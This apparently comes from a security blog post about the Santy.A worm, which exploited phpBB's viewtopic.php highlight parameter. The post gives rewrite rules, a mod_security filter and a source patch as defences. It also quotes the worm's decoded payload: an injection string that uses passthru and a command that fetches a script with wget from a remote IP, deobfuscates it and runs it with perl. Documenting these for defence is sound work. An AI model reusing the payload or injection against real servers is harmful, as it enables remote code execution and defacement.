There is currently a worm spreading around the Internet that is searching for phpBB based message boards that are vulnerable. All previous versions are affected unless patched, except for the latest version which is 2. There may well be some manual exploitation taking place, but mainly this issue is being expolited by a worm called Santy.A , it's also known as a few other names.
I have heard of quite a few boards that have had content modified and because of the payload of this worm it has also been modifying html documents and images, to name a few. Exploiting the issue allows the worm to write a Perl script to a file on the server then run it, which allows the rest of the payload to be applied and also allows for the worm to start scanning for other vulnerable phpBB boards to compromise.
Aside from applying a patch orm upgrading, there are a few other things that can be done that some people have implemented, which could stop any attack by the worm before boards are updated which is handy if you run a server with a lot of sites running older versions of phpBB on it.
Creating a rewrite rule such as the following should help to provide a quick fix.
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^.*$ - [F]
Or if you use mod_security in Apache you could use the following:
SecFilterSelective "THE_REQUEST" "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("
Some work has already been done to decode the payload, which has been reported as:
rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl b0t*; echo _END_
highlight='.passthru($HTTP_GET_VARS[rush]).'
Modifying the following code in the file viewtopic.php will resolve the issue, if you don't want to upgrade:
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
for($i = 0; $i < sizeof($words); $i++)
{
Replace with:
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));
for($i = 0; $i < sizeof($words); $i++)
{
A lot of sites have already been defaced, another good reason to have a recent backup copy in addition to keeping updated on security issues and applying appropriate patches.
Post ID: 603, posted by jase at 11:51 PMThanks for signing in, . Now you can comment. (sign out)
(If you haven't left a comment here before, you may need to be approved before your comment will appear.)